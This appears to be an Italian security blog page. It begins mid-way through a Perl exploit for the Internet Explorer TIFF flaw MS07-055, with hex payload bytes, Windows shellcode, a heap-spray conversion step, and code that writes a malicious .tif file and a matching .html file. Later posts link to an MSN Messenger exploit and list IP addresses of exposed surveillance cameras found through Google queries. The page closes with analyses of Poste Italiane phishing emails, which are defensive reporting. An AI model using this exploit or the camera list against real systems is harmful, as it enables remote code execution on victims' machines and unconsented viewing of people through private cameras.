“\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52\x39\x24″.
“\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6\x5D\x2F”.
“\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C\x4E\x67″.
“\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54\x3A\x25″.
“\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36\x9D\x4F”.
“\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC\x56\x6B”.
“\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56\x3B\x25″.
“\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F”.
“\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC\x5E\x6F”.
“\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58\x3C\x26″.
“\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37\x1D\x8F”.
“\xC8\x64\x72\x59\x3C\xA6\x57\x2D\x97\x96\x40\x40″.
“\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84\x42\x61″.
“\x50\xB8\x64\x36\x1D\x0F\x88\x44\x62\x51\x38\xA4″.
“\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76\x3D\x1F”.
“\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94\x4A\x65″.
“\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53\x39\xA4″.
“\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F”.
“\xA0\x50\x68\x54\x3A\x25\x16\x8D\x47\xA4\x52\x69″.
“\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5″.
“\x56\xAD\x57\xAC\x56\x6B\x55\xBA\xE5\x76\xBD\x5F”.
“\xB0\x58\x6C\x56\x3B\x25\x96\xCD\x67\xB4\x5A\x6D”.
“\x56\xBB\x65\xB6\xDD\x6F\xB8\x5C\x6E\x57\x3B\xA5″.
“\xD6\xED\x77\xBC\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F”.
“\xC0\x60\x70\x58\x3C\x26\x17\x0D\x87\xC4\x62\x71″.
“\x58\xBC\x66\x37\x1D\x8F\xC8\x64\x72\x59\x3C\xA6″.
“\x57\x2D\x97\x96\x40\x40\x80\x3F\xE0\x50\x38\x24″.
“\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36\x1D\x0F”.
“\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C\x46\x63″.
“\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52\x39\x24″.
“\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6\x5D\x2F”.
“\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C\x4E\x67″.
“\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54\x3A\x25″.
“\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36\x9D\x4F”.
“\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC\x56\x6B”.
“\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56\x3B\x25″.
“\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F”.
“\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC\x5E\x6F”.
“\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58\x3C\x26″.
“\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37\x1D\x8F”.
“\xC8\x64\x72\x59\x3C\xA6\x57\x2D\x97\x96\x40\x40″.
“\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84\x42\x61″.
“\x50\xB8\x64\x36\x1D\x0F\x88\x44\x62\x51\x38\xA4″.
“\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76\x3D\x1F”.
“\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94\x4A\x65″.
“\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53\x39\xA4″.
“\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F”.
“\xA0\x50\x68\x54\x3A\x25\x16\x8D\x47\xA4\x52\x69″.
“\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5″.
“\x56\xAD\x57\xAC\x56\x6B\x55\xBA\xE5\x76\xBD\x5F”.
“\xB0\x58\x6C\x56\x3B\x25\x96\xCD\x67\xB4\x5A\x6D”.
“\x56\xBB\x65\xB6\xDD\x6F\xB8\x5C\x6E\x57\x3B\xA5″.
“\xD6\xED\x77\xBC\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F”.
“\xC0\x60\x70\x58\x3C\x26\x17\x0D\x87\xC4\x62\x71″.
“\x58\xBC\x66\x37\x1D\x8F\xC8\x64\x72\x59\x3C\xA6″.
“\x57\x2D\x97\x96\x40\x40\x80\x3F\xE0\x50\x38\x24″.
“\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36\x1D\x0F”.
“\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C\x46\x63″.
“\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52\x39\x24″.
“\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6\x5D\x2F”.
“\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C\x4E\x67″.
“\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54\x3A\x25″.
“\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36\x9D\x4F”.
“\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC\x56\x6B”.
“\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56\x3B\x25″.
“\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F”.
“\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC\x5E\x6F”.
“\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58\x3C\x26″.
“\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37\x1D\x8F”.
“\xC8\x64\x72\x59\x3C\xA6\x57\x2D\x97\x96\x40\x40″.
“\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84\x42\x61″.
“\x50\xB8\x64\x36\x1D\x0F\x88\x44\x62\x51\x38\xA4″.
“\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76\x3D\x1F”.
“\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94\x4A\x65″.
“\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53\x39\xA4″.
“\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F”.
“\xA0\x50\x68\x54\x3A\x25\x16\x8D\x47\xA4\x52\x69″.
“\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5″.
“\x56\xAD\x57\xAC\x56\x6B\x55\xBA\xE5\x76\xBD\x5F”.
“\xB0\x58\x6C\x56\x3B\x25\x96\xCD\x67\xB4\x5A\x6D”.
“\x56\xBB\x65\xB6\xDD\x6F\xB8\x5C\x6E\x57\x3B\xA5″.
“\xD6\xED\x77\xBC\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F”.
“\xC0\x60\x70\x58\x3C\x26\x17\x0D\x87\xC4\x62\x71″.
“\x58\xBC\x66\x37\x1D\x8F\xC8\x64\x72\x59\x3C\xA6″.
“\x57\x2D\x97\x96\x40\x40\x80\x3F\xE0\x50\x38\x24″.
“\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36\x1D\x0F”.
“\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C\x46\x63″.
“\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52\x39\x24″.
“\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6\x5D\x2F”.
“\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C\x4E\x67″.
“\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54\x3A\x25″.
“\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36\x9D\x4F”.
“\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC\x56\x6B”.
“\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56\x3B\x25″.
“\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F”.
“\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC\x5E\x6F”.
“\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58\x3C\x26″.
“\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37\x1D\x8F”.
“\xC8\x64\x72\x59\x3C\xA6\x57\x2D\x97\x96\x40\x40″.
“\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84\x42\x61″.
“\x50\xB8\x64\x36\x1D\x0F\x88\x44\x62\x51\x38\xA4″.
“\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76\x3D\x1F”.
“\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94\x4A\x65″.
“\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53\x39\xA4″.
“\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F”.
“\xA0\x50\x68\x54\x3A\x25\x16\x8D\x47\xA4\x52\x69″.
“\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5″.
“\x56\xAD\x57\xAC\x56\x6B\x55\xBA\xE5\x76\xBD\x5F”.
“\xB0\x58\x6C\x56\x3B\x25\x96\xCD\x67\xB4\x5A\x6D”.
“\x56\xBB\x65\xB6\xDD\x6F\xB8\x5C\x6E\x57\x3B\xA5″.
“\xD6\xED\x77\xBC\x5E\x6F\x57\xBB\xE5\xF6\xFD\x7F”.
“\xC0\x60\x70\x58\x3C\x26\x17\x0D\x87\xC4\x62\x71″.
“\x58\xBC\x66\x37\x1D\x8F\xC8\x64\x72\x59\x3C\xA6″.
“\x57\x2D\x97\x96\x40\x40\x80\x3F\xE0\x50\x38\x24″.
“\x16\x0D\x07\x84\x42\x61\x50\xB8\x64\x36\x1D\x0F”.
“\x88\x44\x62\x51\x38\xA4\x56\x2D\x17\x8C\x46\x63″.
“\x51\xB8\xE4\x76\x3D\x1F\x90\x48\x64\x52\x39\x24″.
“\x96\x4D\x27\x94\x4A\x65\x52\xB9\x64\xB6\x5D\x2F”.
“\x98\x4C\x66\x53\x39\xA4\xD6\x6D\x37\x9C\x4E\x67″.
“\x53\xB9\xE4\xF6\x7D\x3F\xA0\x50\x68\x54\x3A\x25″.
“\x16\x8D\x47\xA4\x52\x69\x54\xBA\x65\x36\x9D\x4F”.
“\xA8\x54\x6A\x55\x3A\xA5\x56\xAD\x57\xAC\x56\x6B”.
“\x55\xBA\xE5\x76\xBD\x5F\xB0\x58\x6C\x56\x3B\x25″.
“\x96\xCD\x67\xB4\x5A\x6D\x56\xBB\x65\xB6\xDD\x6F”.
“\xB8\x5C\x6E\x57\x3B\xA5\xD6\xED\x77\xBC\x5E\x6F”.
“\x57\xBB\xE5\xF6\xFD\x7F\xC0\x60\x70\x58\x3C\x26″.
“\x17\x0D\x87\xC4\x62\x71\x58\xBC\x66\x37\x1D\x8F”.
“\xC8\x64\x72\x59\x3C\xA6\x57\x2D\x97\x96\x40\x40″.
“\x80\x3F\xE0\x50\x38\x24\x16\x0D\x07\x84\x42\x61″.
“\x50\xB8\x64\x36\x1D\x0F\x88\x44\x62\x51\x38\xA4″.
“\x56\x2D\x17\x8C\x46\x63\x51\xB8\xE4\x76\x3D\x1F”.
“\x90\x48\x64\x52\x39\x24\x96\x4D\x27\x94\x4A\x65″.
“\x52\xB9\x64\xB6\x5D\x2F\x98\x4C\x66\x53\x39\xA4″.
“\xD6\x6D\x37\x9C\x4E\x67\x53\xB9\xE4\xF6\x7D\x3F”.
“\xA0\x50\x68\x54\x3A\x25\x16\x8D\x47\xA4\x52\x69″.
“\x54\xBA\x65\x36\x9D\x4F\xA8\x54\x6A\x55\x3A\xA5″.
“\x56\xAD\x57\x86\x40\x40\x60\x00\x00\x00\x01\x00″.
“\x00\x00\x60\x00\x00\x00\x01\x00\x00\x00\x08\x00″.
“\x08\x00\x08\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xB4\x00\x00\x00\xBA\x00\x00\x00″.
“\xBA\x00\x03\x00\xCA\x00\x00\x00\xDB\x00\x00\x00″.
“\xD7\x00\x00\x00\xD6\x00″;

my $eip = “\x0c\x0c\x0c\x0c”;
my $data_0400 = “\x08\x00\x40\x00″;
my $data_null = “\x11\x00\x40\x00″;

my $tiff2 =
“\x00\x00\xB9\x90\x90\x90\x90\x90\xFC\xE8″.
“\x44\x00\x00\x00\x8B\x45\x3C\x8B\x7C\x05\x78\x01″.
“\xEF\x8B\x4F\x18\x8B\x5F\x20\x01\xEB\x49\x8B\x34″.
“\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0\x74\x07\xC1″.
“\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x04\x75\xE5″.
“\x8B\x5F\x24\x01\xEB\x66\x8B\x0C\x4B\x8B\x5F\x1C”.
“\x01\xEB\x8B\x1C\x8B\x01\xEB\x89\x5C\x24\x04\xC3″.
“\x31\xC0\x64\x8B\x40\x30\x85\xC0\x78\x0C\x8B\x40″.
“\x0C\x8B\x70\x1C\xAD\x8B\x68\x08\xEB\x09\x8B\x80″.
“\xB0\x00\x00\x00\x8B\x68\x3C\x5F\x31\xF6\x60\x56″.
“\x89\xF8\x83\xC0\x7B\x50\x68\x7E\xD8\xE2\x73\x68″.
“\x98\xFE\x8A\x0E\x57\xFF\xE7\x63\x61\x6C\x63\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\xAE\x00\x00\x00″.
“\xAE\x00\x00\x00\xAE\x00\x00\x00\x66\x00\x00\x00″.
“\x08\x00\x00\x00\xB6\x00\x00\x00\x64\x01\x00\x00″.
“\x12\x02\x00\x00\xC0\x02\x00\x00\x6E\x03\x00\x00″.
“\x1C\x04\x00\x00\xD0\x04\x00\x00\x8A\x05\x00\x00″.
“\x44\x06\x00\x00\x0E\x07\x00\x00\xE9\x07\x00\x00″.
“\xC0\x08\x00\x00\x96\x09\x00\x00\xB1\x0A\x00\x00″.
“\x99\x0B\x00\x00\x47\x0C\x00\x00\xF5\x0C\x00\x00″.
“\xA3\x0D\x00\x00\x5C\x0E\x00\x00\x16\x0F\x00\x00″.
“\xD2\x0F\x00\x00\x92\x10\x00\x00\x40\x11\x00\x00″.
“\xEE\x11\x00\x00\x9C\x12\x00\x00\x4A\x13\x00\x00″.
“\xF8\x13\x00\x00\xA6\x14\x00\x00\x54\x15\x00\x00″.
“\x02\x16\x00\x00\xB0\x16\x00\x00\x5E\x17\x00\x00″.
“\x0C\x18\x00\x00\xBA\x18\x00\x00\x68\x19\x00\x00″.
“\x16\x1A\x00\x00\xC4\x1A\x00\x00\x72\x1B\x00\x00″.
“\x20\x1C\x00\x00\xCE\x1C\x00\x00\x7C\x1D\x00\x00″.
“\x2A\x1E\x00\x00\xD8\x1E\x00\x00\x86\x1F\x00\x00″.
“\x34\x20\x00\x00\xE2\x20\x00\x00\x90\x21\x00\x00″.
“\x3E\x22\x00\x00\xEC\x22\x00\x00\x9A\x23\x00\x00″.
“\x48\x24\x00\x00\xF6\x24\x00\x00\xA4\x25\x00\x00″.
“\x52\x26\x00\x00\x00\x27\x00\x00\xAE\x27\x00\x00″.
“\x5C\x28\x00\x00\x0A\x29\x00\x00\xB8\x29\x00\x00″.
“\x66\x2A\x00\x00\x14\x2B\x00\x00\xC2\x2B\x00\x00″.
“\x70\x2C\x00\x00\x1E\x2D\x00\x00\xCC\x2D\x00\x00″.
“\x7A\x2E\x00\x00\x28\x2F\x00\x00\xD6\x2F\x00\x00″.
“\x84\x30\x00\x00\x32\x31\x00\x00\xE0\x31\x00\x00″.
“\x8E\x32\x00\x00\x3C\x33\x00\x00\xEA\x33\x00\x00″.
“\x98\x34\x00\x00\x46\x35\x00\x00\xF4\x35\x00\x00″.
“\xA2\x36\x00\x00\x50\x37\x00\x00\xFE\x37\x00\x00″.
“\xAC\x38\x00\x00\x5A\x39\x00\x00\x08\x3A\x00\x00″.
“\xB6\x3A\x00\x00\x64\x3B\x00\x00\x0F\x00\xFE\x00″.
“\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01″.
“\x03\x00\x01\x00\x00\x00\x80\x02\x00\x00\x01\x01″.
“\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x02\x01″.
“\x03\x00\xFF\x00\x00\x00\xDA\x3B\x00\x00\x03\x01″.
“\x03\x00\x01\x00\x00\x00\x05\x00\x00\x00\x06\x01″.
“\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x11\x01″.
“\x04\x00\x56\x00\x00\x00\x38\x3D\x00\x00\x15\x01″.
“\x03\x00\x01\x00\x00\x00\x03\x00\x00\x00\x16\x01″.
“\x04\x00\x01\x00\x00\x00\x06\x00\x00\x00\x17\x01″.
“\x04\x00\x56\x00\x00\x00\xE0\x3B\x00\x00\x1A\x01″.
“\x05\x00\x01\x00\x00\x00\xCA\x3B\x00\x00\x1B\x01″.
“\x05\x00\x01\x00\x00\x00\xD2\x3B\x00\x00\x1C\x01″.
“\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x28\x01″.
“\x03\x00\x01\x00\x00\x00\x02\x00\x00\x00\x3D\x01″.
“\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00″.
“\x00\x00″;

# convert shellcode for javascript
if ((length($shellcode) / 2) =~ /\./) {
$shellcode .= “\x00″;
}

$shellcode =~ s/(.)(.)/’%u’.unpack(“H*”,
$2).unpack(“H*”, $1)/ge;

# write tiff file

open(FILE, “>ms07-055.tif”);
binmode(FILE);

print FILE $tiff1;
print FILE $eip;
print FILE $data_0400;
print FILE $data_0400;
print FILE $data_0400;
print FILE $data_null;
print FILE $tiff2;

close(FILE);

# write html file

open(FILE, “>ms07-055.html”);

print FILE <

Microsoft Internet Explorer TIF/TIFF Code Execution<br /> (MS07-055)

HTML

close(FILE);

Bug su MSN Messenger e Messenger Live. Il Bug è dichiarato dai maggiori esperti di sicurezza come critico e secondo le prime dichiarazioni Microsoft non si riuscirà a risolvere il problema prima di un mese. In pratica il bug interessa la funzionalità di videochat: un malintenzionato può inviare un invito malformato alla vittima e di conseguenza il computer della vittima esegue i comandi dell’attaccante…

Il bug affligge tutte le versione di MSN Messenger 7.x e MSN Messenger 8. La tecnica usata è quella del buffer overflow: una tecnica molto diffusa che permette di rendirizzare il flusso di un programma verso le aree di memorie in cui sono contenute le istruzioni che l’attaccante desidera usare (una definizione si può trovare qui).

Esistono diversi exploit per mettere in atto l’attacco, uno si può scaricare dal mio sito cliccando qui. L’utilizzo è semplice:

A presto, arturu.it

Google Hacking Query, questa è una di quelle tecniche più usate quando si vogliono scoprire delle informazioni molto riservate che si trovano su dei siti internet: mail, database, servizi e altro ancora. I webmaster e gli amministratori di rete cercano in ogni modo di nascondere queste informazioni in modo da non farle visualizzare ai visitatori del sito, però alcune volte google le indicizza e inserendo i giusti comandi nel motore di ricerca si riesce a trovare un sacco di cose…

Google è un potente motore di ricerca che mette a disposizione degli utenti un sacco di funzionalità per poter effettuare le ricerche, inoltre ha delle funzionalità interne che vengono utilizzate dal motore per diversi motivi: pubblicitarie, statistiche, strumenti per webmaster, strumenti di ottimizzazione dei siti ecc. Queste funzionalità utilizzate e combinate in un certo modo possono essere sfruttate per carpire delle informazioni molto riservate. Questa tecnica è sempre esistita ma il modo d’utilizzo cambia spesso perché vengono sviluppate in google sempre nuove funzionalità.

Tempo fà una tecnica molto in voga era la ricerca dei file multimediali (mp3, filmati, ecc) in server in cui le directory non erano protette. Ad esempio se voglio trovare delle cartelle non protette mi basta cercare tutte le pagine che hanno come titolo: index of, che è il titolo della pagina generata automaticamente dal server http quando una cartella non è protetta, inserendo come filtro intitle:”index.of”. In questo modo google ricercherà tutte le cartelle non protette sul web, è necessario restringere il campo di ricerca inserendo un altro filtro: (mp3|wav|mpeg|mp4|avi|ecc), in questo modo ricercherà le cartelle non protette che contengono file multimediali. Il risultato sarà come in questa pagina. Bisogna precisare una cosa, dato che ormai è una tecnica che utilizzano in molti, alcuni fubacchioni preparano delle pagine apposite con degli mp3 a pagamento tramite dialer. Un risultato buono è come quello in questa pagina.

Ritorniamo all’argomento dell’articolo. Combinando questi comandi oltre a scaricare da internet file che sarebbe quasi impossibile trovare si possono scaricare un sacco di altre informazioni molto più interessanti. Come al solito non scrivo direttamente i comandi li metto su immagini:

inoltre su You Tube sono disponibili un sacco di video che illustrano la tecnica:

video1 video2 video3 video4 video5 video6 video7 video8 video9 video10

Un’altro tipo di risultato che google riesce ad intercettare sono le telecamere collegate in rete o controllate a distanza.  La tecnica è semplice basta sapere il modello della telecamera a circuito chiuso, ad esempio la Axis 2100. Si può mettere come parametro di ricerca le seguenti queris:

Ecco una lista, non tutti funzionano perché cambiano spesso indirizzo e bisogna rifare la ricerca, alcune ricerche sono impressionanti, perfino le telecamere interne.

http://130.111.224.27/view/view.shtml?videos=&id=2494
http://212.181.20.125/view/view.shtm
http://63.243.46.98:8082/view/view.shtml
http://195.196.35.90/view/view.shtm
http://128.128.32.108/view/view.shtml
http://microcam.eecs…/view.shtml?videos= (Tel. interna)
http://131.204.75.149/view/view.shtml
http://66.14.118.60/view/view.shtml
http://webcam03.deg.net/view/view.shtml?videos=
http://vocafe.aces.utexas.edu/view/view.shtml (interna caffe campus)
http://lfcam1.lf.psu.edu/view/view.shtml
http://ecam1.erskine.edu/view/view.shtml
http://82.188.208.242/view/view.shtml (mercato di chioggia)
http://cam1.asa.utk.edu/view/view.shtm
http://cam1.asa.utk.edu/view/view.shtml
http://130.111.231.69/view/view.shtml
http://cam002.ethz.ch/view/view.shtml?videos=&id=12
http://argus.sunderland.ac.uk/view/view.shtml
http://166.66.36.136/view/view.shtml
http://webcam1.is.uregina.ca/view/view.shtml
http://tarot4.obs-azur.fr/…/mjpg/video.mjpg&size=1
http://216.66.37.162:8000/view/view.shtml?videos=&id=83
http://192.121.228.226/view/view.shtml?videos=&id=226
http://webcam.modeemi.fi/view/view.shtml
http://circlecam.erskine.edu/view/view.shtml
http://cbawebcam.cba.nau.edu/view/view.shtml
http://taylorcam.caed.kent.edu/view/view.shtm
http://keursview.st.hhs.nl/view/view.shtml
http://ksunlivecam.sonoma.edu/view/view.shtml?videos=
http://cams.salden.nl:4445/view/view.shtml?videos=
http://213.3.2.205/view/view.shtml?videos=one
http://217.128.151.33/view/view.shtml?imagePath=
http://213.179.229.20/view/view.shtml
http://webcam.etvj.ch/view/view.shtml?videos=

Un saluto a tutti Arturu.it

Oggi mi è arrivata una nuova mail da Poste Italiane (sempre molto falsa e piena di orrori ortografici), questa volta oltre che ai dati utente e ai dati della carta postapay mi chiedeva anche il codice di sicurezza (quello di 10 cifre per intenderci). A fine procedura (naturalemnte ho messo dati falsi) mi fà tornare alla pagina di login del vero sito Poste Italiane, in questo modo si è indotti a ripetere la procedura con il vero sito e non ci si accorge dell’inganno.

Questo truffatore è molto più inteligente rispetto a quello di ieri, infatti, nella finta procedura chiede anche il codice di sicurezza e a fine procedura fà andare la vittima alla pagina di login del sito originale. Questa soluzione fà insospettire di meno la vittima che difficilmente andrà in posta a bloccare la carta. Continuando ad indagare sul sito finto mi accorgo di altri aspetti che ci fanno capire che questo truffatore è un vero professionista.

Per costruire la copia del sito ha utilizzato uno già esistente e ha salvato i suoi file in sottocarte imboscate in modo che il vero proprietario non si accorga di nulla. Non ha neanche lasciato qualche traccia che permette di risalire all’indirizzo a cui vanno racapitate le informazioni delle persone truffate. Le uniche persone che potrebbero individuare la mail sono l’amministratore del sito (è uno spagnolo) o la Polizia Postale, tutto inutile perchè tra un pò il truffatore cancellerà tutto.

Ciao…

Il link del sito fasullo di Poste Italiane

Quando si parla Phishing la maggior parte delle persone pensa che si stà parlando di bisogni fisiologici oppure i più malizioni pensano subito al mondo dell’erotismo. Il Phishing, è una tecnica di ingegneria sociale, punta a carpire le informazioni riservate di una persona. L’aspetto più tragico delle tecniche di ingnegneria sociale (dato che l’obbietivo sono le informazioni e quindi beni immateriali) è che la vittima difficilmente si accorgerà dell’attacco, a parte quei casi in cui le informazioni sono utilizzate per sottrare beni materiali. Per chi non ne sa niente e volesse approfondire può consultare: Phishing, Ingegneria Sociale.

Ho deciso di parlare di questa tecnica perché stamattina ho subito un tentativo di phishing. Mi è arrivata una mail da Poste Italiane chiedendomi di reinserire i dati del mio conto pena un mancato servizio, logicamente è un tentativo di frode, un modo subdolo per riuscire a carpire i miei dati per rubarmi i miei 20 euri che ho sul conto, cattivone  … Ora ti aggiusto io…

Stamattina come al solito vado a controllare la posta. Tra le mail che mi sono arrivate c’erano tre da parte di Poste Italiane. Mi domando “Cosa sarà mai successo. Un cataclisma che incombe su tutto l’universo.”. Poi il contenuto mi ha veramente stupito.

Il contenuto della prima:

Il phishing и una frode informatica, realizzata con l’invio di e-mail contraffatte, inalizzata all’acquisizione, per scopi illegali, di dati riservati.
Gentile Cliente,
nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.

L’inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione.

Per ovviare al problema e necessaria la verifica e l’aggiornamento dei dati relativi all’anaagrafica dell’Intestatario dei servizi Postali. Effetuare l’aggiornamento dei dati cliccando sul seguente collegamento sicuro:

https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp

Cordiali Saluti.

Il contenuto della seconda:

Oggetto: Comunicazione nr. 91219 del 26 Aprile 2007 – Leggere con attenzione

Gentile Cliente,
Nell’ambito di un progetto di verifica dei data anagrafici forniti durante la sottoscrizione dei servizi di Posteitaliane e stata riscontrata una incongruenza relativa ai dati anagrafici in oggetto da Lei forniti all momento della sottoscrizione contrattuale.

L’inserimento dei dati alterati puo costituire motivo di interruzione del servizio secondo gli art. 135 e 137/c da Lei accettati al momento della sottoscrizione, oltre a costituire reato penalmente perseguibile secondo il C.P.P ar.415 del 2001 relativo alla legge contro il riciclaggio e la transparenza dei dati forniti in auto certificazione.

Per ovviare al problema e necessaria la verifica e l’aggiornamento dei dati relativi all’anaagrafica dell’Intestatario dei servizi Postali. Effetuare l’aggiornamento dei dati cliccando sul seguente collegamento sicuro:

https://bancopostaonline.poste.it/bpol/cartepre/formslogin.asp

Cordiali Saluti.

A parte che il mio programma di posta (Thunderbird) mi segnalava la possibilità che fosse una frode c’erano molti motivi per capire subito che si trattava di una frode:

Come prima cosa ho chiuso  tutti gli avvisi di firefox. Nelle caselle dove mi chiedeva “Nome utente” e “Password” ho messo dati fasulli (una valanga di volgarità ). Appena premuto su “Esegui” un’altra schermata simile al sito di poste.it mi chiedeva i dati della carta postepay e qui un’altra valanga di dati falsi (vedi figura a sinistra, è presente anche la funzione che calcola il numero di caratteri inseriti), appena cliccato su “vai” come per magia mi fa arrivare alla vera home page di poste.it, naturalmente per non destare sospetti.

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

%ERROR:101: no entries found
%
% No entries found in the selected source(s).